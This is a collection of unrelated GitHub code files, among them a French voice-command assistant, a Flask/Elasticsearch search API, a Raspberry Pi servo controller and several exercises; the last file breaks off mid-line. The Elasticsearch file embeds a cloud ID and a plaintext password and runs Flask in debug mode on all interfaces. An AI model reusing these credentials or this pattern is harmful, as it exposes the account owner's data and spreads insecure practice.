+{"seq_id":"74790652216","text":"\"\"\"The idea of this project rests on four steps:\n\n1. Receive a voice command and split it into word slices (time-series data);\n\n2. Process each slice to obtain its evolution over time: determine the characteristics of each slice (Tt, St and Rt);\n\n3. Reconstruct the author's sentence, in text form (by looking up the characteristics of each word in our list of pre-trained words);\n\n4. Execute the command expressed by the author's utterance.\n\nNB: Given the scope of the command-execution part, we limited ourselves to a certain number of commands: shut down a computer, open a program by its name, write a text in txt or word format, run queries in the web browser, create, open, modify or delete a folder or a file. \n\"\"\"\n\nimport nltk\nnltk.download('punkt')\nimport os\nimport time\n# alternatively: import pygame.mixer\nfrom playsound import playsound\nfrom gtts import gTTS\nimport webbrowser\nfrom tkinter import messagebox\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy import interpolate\nimport scipy.stats # used by the ttest_rel significance tests below\n\n# Since capturing sound is not easy, especially in real time, let's use a single word as an example (eteindre)\n# eteindre.txt is a dataframe corresponding to our series\n\n# Table of the series values (DataFrame)\ndef coordonnees(mot):\n    et=open(mot)\n    data=et.read()\n    data=data[27:].replace(\",\",\".\")\n    D=data.split()\n    t=[]\n    X=[]\n    for i in range(0,len(D)-1,2):\n        t.append(float(D[i]))\n        X.append(abs(float(D[i+1])))\n    Y=[]\n    for i in range(len(t)):\n        Y.append([t[i],X[i]])\n    dta=pd.DataFrame(Y,columns=['co1','co2'])\n    return dta\n    \nmot='spectre.txt'\ndta=coordonnees(mot)\n\nTable=(list(dta.co1),list(dta.co2))\n\n\n# Create/read an utterance aloud\ndef sonn(my_text,t):\n    language=('fr')\n    fich=\"audio\"+str(t)+\".mp3\"\n    my_audio=gTTS(text=my_text,lang=language,slow=False)\n    my_audio.save(fich)\n    playsound(fich)\n    # or:\n    #pygame.mixer.init()\n    #pygame.mixer.music.load(fich)\n    #pygame.mixer.music.play()\n    #time.sleep(6)\n\n# Training the reading of the words\n\ndef dict_entrainement_mots():\n    f=open('liste_francais.txt','r')\n    tex=f.read()\n    mots=tex.split()\n    d={}\n    for i in mots:\n        sonn(i,0)\n        song=i+\".mp3\"\n        songg=song+'.txt'\n        dta=coordonnees(songg)\n        dta.co2.interpolate(inplace=True)\n        res = sm.tsa.seasonal_decompose(dta.co2,period = 30)\n        # res consists of 3 dataframe columns: trend, seasonal, residual\n        d[i]=res\n    return d\n\n# This step only needs to be executed once\nglobal dict_mots_pre_entraine\ndict_mots_pre_entraine=dict_entrainement_mots()\n\n# Receive and split a sound: step 
1\n\n# Split into word slices\n\ndef divise_mots(table):\n    lm=[]\n    t=table[0]\n    X=table[1]\n    pos=0\n    for i in range(len(t)):\n        while i<len(t) and X[i]>0.001:\n            i+=1\n        m=(t[pos:i],X[pos:i])\n        lm.append(m)\n        pos=i\n    return lm\n\nlist_mots=divise_mots(Table) \n\n# Characterize the author's words: step 2\n\ndef dict_caracterisation_mot(list_mots):\n    \n    ide=0 # word identifier\n    dict_mots={}\n    for mot in list_mots:\n        serie = pd.Series(mot[1]) # this word's own samples\n        serie.interpolate(inplace=True)\n        res = sm.tsa.seasonal_decompose(serie,period = 30)\n        # res consists of 3 series: trend, seasonal, residual\n        dict_mots[ide]=res\n        ide+=1  \n    return dict_mots\n\n\ndict_mots=dict_caracterisation_mot(list_mots)\nprint(dict_mots)\n\n# Reconstruct the author's utterance: step 3\ndef reconstitu_com(dict_mots):\n    command=\"\"\n    \n    for mot in dict_mots.values():\n        \n        for m_pre in dict_mots_pre_entraine.values():\n            a=b=c=False\n            # test for the trend\n            # compute the error between each command word and each word of the pre-trained dictionary\n            erreur=[list(mot.trend)[i]-list(m_pre.trend)[i] for i in range(min(len(mot.trend),len(m_pre.trend)))]\n            # run a significance test on the error variable, at the 95% level, i.e. alpha=5%\n            # This checks that the error is almost constant, so the two curves are almost parallel\n            if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n                a=True\n            \n            # Do the same for the seasonal and residual components\n            erreur=[list(mot.seasonal)[i]-list(m_pre.seasonal)[i] for i in range(min(len(mot.seasonal),len(m_pre.seasonal)))]\n            if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n                b=True\n\n            erreur=[list(mot.resid)[i]-list(m_pre.resid)[i] for i in range(min(len(mot.resid),len(m_pre.resid)))]\n            if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n                c=True\n\n            if a and b and c:\n                command+=list(dict_mots_pre_entraine.keys())[list(dict_mots_pre_entraine.values()).index(m_pre)]\n    return command\n\nCommand=reconstitu_com(dict_mots)\n\n# Ex: Command=\"eteindre mon ordinateur!\"\n\n# Class of the possible executions\nclass execution_com:\n\n    def __init__(self):\n        self.action=\"\"\n        self.nom=\"\"\n\n    def eteindre(self):\n        my_text0=\"Voulez vous eteindre votre ordinateur?\"\n        sonn(my_text0,0)\n        choice=messagebox.askyesno(\"Eteindre?\",\"Voudriez vous eteindre le PC?\")\n        if choice==True:\n            my_text1=\"D'accord. Veillez patienter!\"\n            sonn(my_text1,1)\n            try:\n                os.system(\"shutdown\")\n            except: \n                my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n        else:\n            my_text2=\"Ah! J'allait vous dire que vous allez me manquer enormement monsieur Abdoul Madjid.\"\n            sonn(my_text2,2)\n            exit()\n    \n    \n    def creer_dossier(self):\n        my_text0=\"Voulez vous creer un dossier \"+self.nom+\"?\"\n        sonn(my_text0,0)\n        choice=messagebox.askyesno(\"Creer?\",\"Voudriez vous creer le nouveau dossier\"+self.nom+\"?\")\n        if choice==True:\n            my_text1=\"D'accord. A votre service!\"\n            sonn(my_text1,1)\n            act=self.action+self.nom\n            try:\n                os.system(act)\n            except: \n                my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n            else:\n                my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n                sonn(my_text2,2)\n                exit()\n    \n    \n    \n    def ouvre_dossier(self):\n        my_text0=\"Voulez vous ouvrir le dossier \"+self.nom+\"?\"\n        sonn(my_text0,0)\n        choice=messagebox.askyesno(\"Voulez vous ouvrir le dossier \"+self.nom+\"?\")\n        if choice==True:\n            my_text1=\"D'accord. 
A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def modif_dossier(self):\n my_text0=\"Voulez vous modifier le dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous modifier le dossier \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def suppri_fich(self):\n my_text0=\"Voulez vous supprimer le dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous supprimer le dossier \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def requete_web(self):\n my_text0=\"Voulez vous consulter la page \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous consulter la page \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n try:\n webbrowser.open(self.nom)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n\n def editer_text(self):\n my_text0=\"Voulez vous editer un fichier nomme \"+self.action+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous editer un fichier nomme \"+self.action+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n try:\n fich=self.action+\".txt\"\n f=open(fich,'a')\n f.write(self.nom)\n f.close()\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n\n def executer(self):\n my_text0=\"Voulez vous Executer \"+self.action+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous executer \"+self.action+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. 
Veiller le faire manuellement!\"\n            else:\n                my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n                sonn(my_text2,2)\n                exit()\n    \n# Process the author's utterance and execute the command: step 4\ndef action(Command):\n    command=Command.split()\n    command=set(command)\n    ex=execution_com()\n\n    eteindre={\"eteindre\",\"eteins\",\"t'etindre\",\"d'eteindre\",\"eteind\"}\n    ouvre={\"ouvre\",\"ouvrir\",\"ouverture\"}\n    executer={\"executer\",\"execute\",\"execution\"}\n    supprime={\"supprimer\",\"supprime\",\"effacer\",\"efface\"}\n    recherche={\"rechercher\",\"recherche\",\"requete\",\"chercher\",\"cherche\"}\n    creer={\"creer\",\"cree\"}\n    modifier={\"modifier\",\"modifie\",\"changer\",\"change\"}\n    editer={\"editer\",\"ecrire\",\"rediger\",\"edite\",\"ecris\",\"redige\"}\n    \n    if len(command.intersection(eteindre))!=0:\n        ex.eteindre()\n    if len(command.intersection(ouvre))!=0:\n        ex.action=\"nautilus \"\n        ex.nom=\"AMS2\"\n        ex.ouvre_dossier()\n    if len(command.intersection(executer))!=0:\n        ex.action=\"google-chrome\"\n        ex.executer()\n    if len(command.intersection(supprime))!=0:\n        ex.action=\"rm -r \"\n        ex.nom=\"AMS2\"\n        ex.suppri_fich()\n    if len(command.intersection(recherche))!=0:\n        ex.nom=\"https://www.google.com/\"\n        ex.requete_web()\n    if len(command.intersection(creer))!=0:\n        ex.action=\"mkdir \"\n        ex.nom=\"AMS1\"\n        ex.creer_dossier()\n    if len(command.intersection(modifier))!=0:\n        ex.action=\"mv \"\n        ex.nom=\"AMS1 AMS2\"\n        ex.modif_dossier()\n    if len(command.intersection(editer))!=0:\n        ex.nom=\"Bonjour et bienvenu!\"\n        ex.action=\"salut\"\n        ex.editer_text()  \n    \naction(Command)\ntry:\n    os.system(\"rm audio0.mp3 audio1.mp3 audio2.mp3\")\nexcept:\n    os.system(\"rm audio2.mp3\")\n","repo_name":"amsanoussi/commande_vocale","sub_path":"command_time_series.py","file_name":"command_time_series.py","file_ext":"py","file_size_in_byte":12135,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"28869343938","text":"class Ponto:\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n    def imprimirValores(self):\n        print(f'X: {self.x}')\n        print(f'Y: {self.y}')\n\nclass Retângulo:\n    def __init__(self, largura, altura):\n        self.largura = largura\n        self.altura = altura\n\n    def encontrarCentro(self):\n        Xmeio = (A.x + B.x) / 2\n        Ymeio = (A.y + B.y) / 2\n        print(f'Xmeio = {Xmeio}')\n        print(f'Ymeio = {Ymeio}')\n\n\ndef cor(string, azul=False, vermelho=False):\n    if vermelho == True:\n        print(f'\\033[1;31m{string}\\033[m')\n    elif azul == True:\n        print(f'\\033[1;34m{string}\\033[m')\n    else:\n        print(f'\\033[1;36m{string}\\033[m')\n\ndef menu():\n    print('-' * 40)\n    cor('[1]Alterar valores do retângulo', azul=True)\n    cor('[2]Mostrar as coordenadas', azul=True)\n    cor('[3]Calcular o centro do retângulo', azul=True)\n    cor('[4]Sair do programa', azul=True)\n    opção = int(input('Opção: '))\n    if opção == 1:\n        ax = int(input('Digite a coordenada x do canto inferior esquerdo: '))\n        A.x = ax\n        ay = int(input('Digite a coordenada y do canto inferior esquerdo: '))\n        A.y = ay\n        bx = int(input('Digite a coordenada x do canto superior direito: '))\n        B.x = bx\n        by = int(input('Digite a coordenada y do canto superior direito: '))\n        B.y = by\n        r1.largura = A\n        r1.altura = B\n        menu()\n    elif opção == 2:\n        print('Ponto inferior esquerdo')\n        A.imprimirValores()\n        print('Ponto superior direito')\n        B.imprimirValores()\n        continuar = input('Pressione Enter para continuar ')\n        menu()\n    elif opção == 3:\n        r1.encontrarCentro()\n        continuar = input('Pressione Enter para continuar ')\n        
menu()\n elif opção == 4:\n print('-'*40)\n cor('Até logo!')\n\n##-----------------------------------------------------------------------\nax = int(input('Digite a coordenada x do canto inferior esquerdo: '))\nay = int(input('Digite a coordenada y do canto inferior esquerdo: '))\nbx = int(input('Digite a coordenada x do canto superior direito: '))\nby = int(input('Digite a coordenada y do canto superior direito: '))\nA = Ponto(ax, ay)\nB = Ponto(bx, by)\nr1 = Retângulo(A, B)\nmenu()","repo_name":"Nilsonsantos-s/Praticando","sub_path":"Python/Python Brasil (SITE)/Programação Orientada a Objetos (POO)/Classe Ponto e Retângulo/Classe Ponto e Retângulo.py","file_name":"Classe Ponto e Retângulo.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"9926888487","text":"from flask import Flask ,request , jsonify\nfrom elasticsearch import Elasticsearch\nimport pandas as pd\nimport json\nimport os\napp=Flask(__name__)\n\n# Create the client instance\n\n#es = Elasticsearch(hosts=[\"http://localhost:9200\"])\nes = Elasticsearch(\n cloud_id='5c3d8718e4c04ecfa161f13670f71f55:dXMtY2VudHJhbDEuZ2NwLmNsb3VkLmVzLmlvOjQ0MyQ2OTBhN2E0NjZmODA0MzhkOTYwOGQ4N2MwNzk1NTkxYSRlMzgyY2NlMmNlYzQ0ZWZiYmM3MGQ3MDNlMWJlYTk2Yw==',\n basic_auth=(\"elastic\", \"XIHCX7seGgbtin4bDUg8InVJ\")\n)\n## THIS IS THE OCE TO CREATE INDEX IN THE ELASTC SEARCH AND LOAD THE DATA IN IT\n\nindex_name = 'article_index' # Choose a suitable index name\n\n# mapping = {\n# 'properties': {\n# 'article_id': {'type': 'text'},\n# 'article_name': {'type': 'text'}\n# }\n# }\n\n# es.indices.create(index=index_name, ignore=400)\n# es.indices.put_mapping(index=index_name, body=mapping)\n\ndef index_product(article_id, article_name):\n document = {\n 'article_id': article_id,\n 'article_name': article_name\n }\n es.index(index=index_name, body=document, id=article_id)\n\narticles = [\n \"Introduction to Python Programming\",\n \"Building RESTful APIs with Flask\",\n \"Data Structures and Algorithms in C++\",\n \"Machine Learning Fundamentals with Scikit-Learn\",\n \"Web Development with JavaScript and React\",\n \"Creating a Responsive Design with CSS Grid\",\n \"Debugging Techniques for Software Developers\",\n \"An Introduction to Git and GitHub Workflow\",\n \"Securing Your Web Applications: Best Practices\",\n \"Diving into Docker: Containerization Simplified\",\n \"Building a RESTful API with Node.js and Express\",\n \"Machine Learning Models for Image Recognition\",\n \"Exploring the World of Blockchain Technology\",\n \"Introduction to Cybersecurity and Ethical Hacking\",\n \"Effective Database Management with SQL\",\n \"Python Data Visualization with Matplotlib\",\n \"Full-Stack Development with MERN Stack\",\n \"Automating Tasks with Python Scripts\",\n \"Data Science: Exploring Pandas and NumPy\",\n \"Machine Learning in Healthcare: Applications and Challenges\",\n \"JavaScript Frameworks: React vs. Angular vs. 
Vue.js\",\n \"Mastering REST API Authentication\",\n \"Scaling Microservices with Kubernetes\",\n \"Software Testing Best Practices\",\n \"The Power of Functional Programming in JavaScript\",\n \"Web Security: Protecting Against Common Attacks\",\n \"Introduction to DevOps: Principles and Tools\",\n \"Creating Your First Mobile App with React Native\",\n \"Quantum Computing: The Future of Information Processing\",\n \"Exploring the Internet of Things (IoT) Development\"\n]\n\n# for i in range(len(articles)):\n# index_product(i,articles[i])\n\n\n@app.route('/search', methods=['POST'])\ndef search():\n req=request.get_json()\n data=req[\"keyword\"].lower()\n body = {\n 'query': {\n 'wildcard': {\n 'article_name': {\n 'value': '*' + data + '*',\n 'boost': 1.0,\n 'case_insensitive': True\n }\n }\n }\n }\n response = es.search(index=index_name, body=body)\n hits = response['hits']['hits']\n print(hits)\n products=[]\n ids=[]\n for hit in hits:\n\n products.append(hit['_source']['article_name'])\n ids.append(hit['_source']['article_id'])\n d = pd.DataFrame({'articles': products, 'article_id': ids})\n data = d.to_dict(orient='records')\n\n # Convert the data to JSON\n json_data = json.dumps(data)\n return json_data\n\n\n@app.route('/add-article-elastic-search',methods=[\"POST\"])\ndef add():\n \n req=request.get_json()\n title=req[\"title\"]\n article_id=req[\"article_id\"]\n try:\n index_product(article_id, title)\n return \"success\"\n except :\n return \"error in adding title to elastic search\"\n\n@app.route('/delete-article-elastic-search',methods=[\"POST\"])\ndef delete():\n req=request.get_json()\n article_name=req[\"article_name\"]\n body = {\n 'query': {\n 'match': {\n 'article_name': article_name\n }\n }\n }\n response = es.search(index=index_name, body=body)\n hits = response['hits']['hits']\n doc_id = hits[0]['_id']\n try:\n es.delete(index=index_name, id=doc_id)\n return \"success\"\n except:\n return \"error in deleting article from elastic search\"\n\n \n\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\",port=int(\"8000\"),debug=True)","repo_name":"Cherit007/MindScribe","sub_path":"AI/search-engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32515434580","text":"import os\n\nfrom MoinMoin.script import _util\nfrom MoinMoin.script._util import MoinScript\nfrom MoinMoin.request import RequestCLI\nfrom MoinMoin.lupy import Index\n\n\nclass IndexScript(MoinScript):\n \"\"\" Lupy general index script class \"\"\"\n\n def __init__(self, argv, def_values):\n MoinScript.__init__(self, argv, def_values)\n self.parser.add_option(\n \"--files\", metavar=\"FILES\", dest=\"file_list\",\n help=\"filename of file list, e.g. 
files.lst (one file per line)\"\n        )\n        self.parser.add_option(\n            \"--update\", action=\"store_true\", dest=\"update\",\n            help=\"when given, update an existing index\"\n        )\n        \n    def mainloop(self):\n        self.init_request()\n        # Do we have additional files to index?\n        if self.options.file_list:\n            self.files = file(self.options.file_list)\n        else:\n            self.files = None\n        self.command()\n\nclass PluginScript(IndexScript):\n    \"\"\" Lupy index build script class \"\"\"\n\n    def command(self):\n        Index(self.request).indexPages(self.files, self.options.update)\n        #Index(self.request).test(self.request)\n\n    \n","repo_name":"imosts/flume","sub_path":"moin/lib/python2.4/site-packages/MoinMoin/script/lupy/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"13139378120","text":"# https://leetcode.com/problems/hand-of-straights/\n\"\"\"\nDescription of the question in the above link\n\"\"\"\n\n\ndef isNStraightHand(hand, W):\n\n    if len(hand) % W != 0:\n        return False\n\n    x = {}\n    for el in hand:\n        if el in x:\n            x[el] += 1\n        else:\n            x[el] = 1\n\n    keys = list(x.keys())\n    keys.sort()\n\n    while keys:\n        start = keys[0]\n\n        for i in range(start, start + W):\n            if i not in x:\n                return False\n            if x[i] == 1:\n                x.pop(i)\n                keys.remove(i)\n            else:\n                x[i] -= 1\n\n    return True\n\n\n# Driver program to test the above function\n\n\ndef main():\n    hand = [1, 2, 3, 6, 2, 3, 4, 7, 8]\n    W = 3\n    print(isNStraightHand(hand, W))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"deep0892/Algorithms_Practice","sub_path":"Leetcode/algorithms-questions/846_Hand_Of_Straights.py","file_name":"846_Hand_Of_Straights.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"74547795895","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\nclass CarControl():\r\n    def __init__(self):\r\n        self.direction_servo_pin=18 # pwm pin on raspberry pi (BCM mode)\r\n        self.direction_servo_delay=0.2 # a delay of 200 ms to be able to take a full turn\r\n        self.direction_lmax=35 # min duty cycle of 35%\r\n        self.direction_rmax=65 # max of 65% duty cycle\r\n        self.direction_center=50\r\n        self.direction_stop=0\r\n        self.pwm_freq=333 # at 333 Hz a 50% duty cycle gives a 1.5 ms pulse\r\n        GPIO.setmode(GPIO.BCM)\r\n        GPIO.setup(self.direction_servo_pin, GPIO.OUT)\r\n        GPIO.output(self.direction_servo_pin,0)\r\n        self.pwm = GPIO.PWM(self.direction_servo_pin, self.pwm_freq )\r\n        self.pwm.start(0) #starting with 0 degrees / straight\r\n        self.trim = 0\r\n\r\n\r\n    def steer_to_angle(self, steer_index):\r\n        if steer_index <= 0:\r\n            steer_index = max(steer_index+self.direction_center,self.direction_lmax)\r\n        else:\r\n            steer_index = min(steer_index+self.direction_center,self.direction_rmax)\r\n        self.steer_angle = self.trim+steer_index\r\n        self.pwm.ChangeDutyCycle(self.steer_angle)\r\n        time.sleep(self.direction_servo_delay)\r\n        self.pwm.ChangeDutyCycle(self.direction_stop)\r\n\r\n\r\n    def steer_right(self,angle):\r\n        if angle>30 or angle<0 :\r\n            print(\"Angle should range from 0-30, 0 being the center of the steering range\")\r\n        self.steer_to_angle(angle//2)\r\n        return\r\n    def steer_left(self,angle):\r\n        if angle>30 or angle<0 :\r\n            print(\"Angle should range from 0-30, 0 being the center of the steering range\")\r\n        self.steer_to_angle(-1* angle//2)\r\n        
return\r\n","repo_name":"cyndwith/DeepPI","sub_path":"speechPI/movement_control.py","file_name":"movement_control.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
+{"seq_id":"29888741048","text":"import os\n\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom typing import Any, Dict\n\n\nclass ApplicationSettings(object):\n    \"\"\"\n    Access to the application settings.\n    \"\"\"\n\n    __config_file_name = 'HttpServ.conf'\n\n    def __new__(cls):\n        # create the class instance only once (singleton)\n        # note: hasattr needs the name-mangled attribute name\n        if not hasattr(cls, '_ApplicationSettings__instance'):\n            cls.__instance = super().__new__(cls)\n\n        return cls.__instance\n\n    def __init__(self):\n        self.__config = ConfigParser()\n\n        # create the settings file with default parameters if it does not exist yet\n        if not os.path.exists(self.__local_config_path()):\n            self.__create_default_local_config()\n\n        self.__read_config()\n\n    @property\n    def adresshost(self) -> str:\n        return self.__get_value('General', 'adresshost', 'localhost')\n\n    @property\n    def porthost(self) -> str:\n        return self.__get_value('General', 'porthost', '8080')\n\n\n    @property\n    def settings(self) -> Dict[str, Any]:\n        return {\n            'General/adresshost': self.adresshost,\n            'General/porthost': self.porthost,\n        }\n\n    def __create_default_local_config(self):\n        self.__config['General'] = {}\n        self.__config['General']['adresshost'] = 'localhost'\n        self.__config['General']['porthost'] = '8080'\n\n\n        path = self.__local_config_path()\n        basedir = os.path.dirname(path)\n\n        if not os.path.exists(basedir):\n            os.makedirs(basedir)\n\n        with open(path, 'w') as config_file:\n            self.__config.write(config_file)\n\n    def __read_config(self):\n        # parse the ini file with the settings\n        self.__config.read(self.__local_config_path())\n\n    def __get_value(self, section: str, key: str, default_value: Any) -> Any:\n        # re-read the file on every access for hot reloading of settings (not the most efficient way)\n        self.__read_config()\n\n        try:\n            return self.__config[section][key]\n        except KeyError:\n            return default_value\n\n    @staticmethod\n    def __home_directory() -> Path:\n        return Path.expanduser(Path('~'))\n\n    @classmethod\n    def __local_config_path(cls) -> Path:\n        return Path(__file__).parent.joinpath('.config', cls.__config_file_name)\n\n\napplication_settings = ApplicationSettings()\n","repo_name":"PopovVasiliy/mainProject","sub_path":"HTTPServProgect/ApplicationSettings.py","file_name":"ApplicationSettings.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"25181531474","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport pyautogui as pg\nimport pyperclip as pc\nimport time as t\n\nruta_driver = \"C:\\\\Program Files (x86)\\\\chromedriver83.exe\"\nurl_base = \"https://www.bvl.com.pe/mercempresas.html\"\n\nbrowser = webdriver.Chrome(ruta_driver)\nbrowser.get(url_base)\n\nt.sleep(3)\npg.hotkey('winleft', 'left')\nt.sleep(2)\npg.press('esc')\nt.sleep(1)\npg.hotkey('ctrl', 'shift', 'i')\nt.sleep(3)\nfor i in range(3):\n    pg.press('up')\npg.hotkey('shift', 'f10')\nt.sleep(3)\nfor i in range(5):\n    pg.press('down')\npg.press('right')\nfor i in range(2):\n    pg.press('down')\npg.press('enter')\npg.hotkey('ctrl', 'shift', 'i')\nhtml = pc.paste()\nsoup = BeautifulSoup(html, \"lxml\") # soup is the object, lxml is the parser\nwith open('html.html', \"wb\") as file:\n    
file.write(soup.prettify(\"utf-8\"))\n","repo_name":"Acadecon/EscrapeoBVL","sub_path":"empresasurls.py","file_name":"empresasurls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29335195620","text":"# coding=utf-8\n# author huxh\n# time 2020/3/24 10:44 AM\n\n\ndef exchange(nums):\n if not nums:\n return []\n\n l = 0\n r = len(nums) - 1\n while l < r:\n while l < r and nums[l] & 1:\n l += 1\n\n while l < r and not nums[r] & 1:\n r -= 1\n nums[l], nums[r] = nums[r], nums[l]\n return nums\n\ndef exchange2(nums):\n if not nums:\n return []\n\n l = 0\n r = 0\n while r < len(nums):\n if nums[r] & 1:\n nums[r], nums[l] = nums[l], nums[r]\n l += 1\n r += 1\n return nums\n\nif __name__ == '__main__':\n print(exchange2([1,3,4,6,7,9]))","repo_name":"Huxhh/LeetCodePy","sub_path":"jianzhioffer/21Exchange.py","file_name":"21Exchange.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23914641062","text":"#! /usr/bin/env python3\n\nimport sys\nimport unittest\nfrom natsort import natsorted\nimport utilitiesservice as utils\n\n\nclass TestEnumeration(unittest.TestCase):\n \"\"\"\n This is more of an integration test suite.\n Gets Gene ID, species of interest and target species\n from command line inputs. Runs the first half in Perl and then\n runs the other half in both Perl and Python in order to compare\n final outputs\n \"\"\"\n\n geneid = 'ENSG00000165175'\n species = 'human'\n interestsp = 'rat,dog'\n oligolen = '14'\n\n def test_oligoout(self):\n # Run Shell scripts\n\n # Get orthologs\n\n prog = 'getEnsemblOrthologTranscripts.pl'\n geneid = self.geneid\n species = self.species\n interestsp = self.interestsp\n outf = 'seqAnnotation.csv'\n options = ['-g', geneid, '-s', species, '-l', interestsp, '-o', outf]\n utils.run(prog, options)\n\n # Get transcripts\n\n with open(outf) as f:\n transcripts = [row.split(',')[0] for row in f]\n\n trans = transcripts[1:]\n trans = (',').join(trans)\n\n # Get seqs\n\n prog = 'getSeqForTranscriptIds.pl'\n fastaf = 'sequence.fa'\n exonout = 'exonBoundaries.csv'\n varout = 'variationData.csv'\n\n options = ['-l', trans, '-f', fastaf, '-a', exonout, '-v', varout]\n utils.run(prog, options)\n\n # Run perl script\n\n prog = 'RnaEnumeration.pl'\n target = 'ENST00000378474'\n oligolen = self.oligolen\n outf = 'oligoOut.csv'\n options = ['-p', target, '-l', oligolen, '-f', fastaf, '-o', outf]\n utils.run(prog, options)\n\n # Final CSV file\n\n prog = 'joinOligoAnnotations.pl'\n oligout = outf\n outf = 'outputSummary_.csv'\n options = ['-l', oligout, '-j', exonout, '-v', varout, '-o', outf]\n utils.run(prog, options)\n\n # Now run the python analogous\n\n outfnew = 'new' + oligout\n options = ['-p', target, '-l', oligolen, '-f', fastaf, '-o', outfnew]\n options = ['callBowtieEnumerate'] + options\n prog = 'RunDesign.py'\n utils.run(prog, options)\n\n outfnewf = 'new' + outf\n options = ['-l', outfnew, '-j', exonout, '-v', varout, '-o', outfnewf]\n options = ['joinOligoOut'] + options\n utils.run(prog, options)\n\n # Get header from test files\n\n [filepl, readpearl] = utils.readAnnotationCsv(oligout)\n [filepy, readpython] = utils.readAnnotationCsv(outfnew)\n rowpl = next(readpearl)\n rowpy = next(readpython)\n\n # Extract indexes of equivalent elements in both headers\n\n indexesh = [rowpl.index(el) for el in rowpy]\n\n # Run the test\n\n 
self.assertEqual(len(indexesh), len(rowpl))\n\n        for rowpl, rowpy in zip(readpearl, readpython):\n            values = [rowpl[el] for el in indexesh]\n            self.assertListEqual(values, rowpy)\n\n        # Flush out\n\n        filepl.close()\n        filepy.close()\n\n        # Get header from test files\n\n        [filepl, readpearl] = utils.readAnnotationCsv(outf)\n        [filepy, readpython] = utils.readAnnotationCsv(outfnewf)\n        rowpl = next(readpearl)\n        rowpy = next(readpython)\n\n        # Extract indexes of equivalent elements in both headers\n\n        indexesh = [rowpl.index(el) for el in rowpy]\n\n        # Run the test\n\n        self.assertEqual(len(indexesh), len(rowpl))\n\n        for rowpl, rowpy in zip(readpearl, readpython):\n            values = [rowpl[el] for el in indexesh]\n            for idx, (row, value) in enumerate(zip(rowpy, values)):\n                if '(' in value:\n                    value = value.split(') ')\n                    value = natsorted(value, key=lambda y: y.lower())\n                    values[idx] = (') ').join(value)\n                if '(' in row:\n                    row = row.split(') ')\n                    row 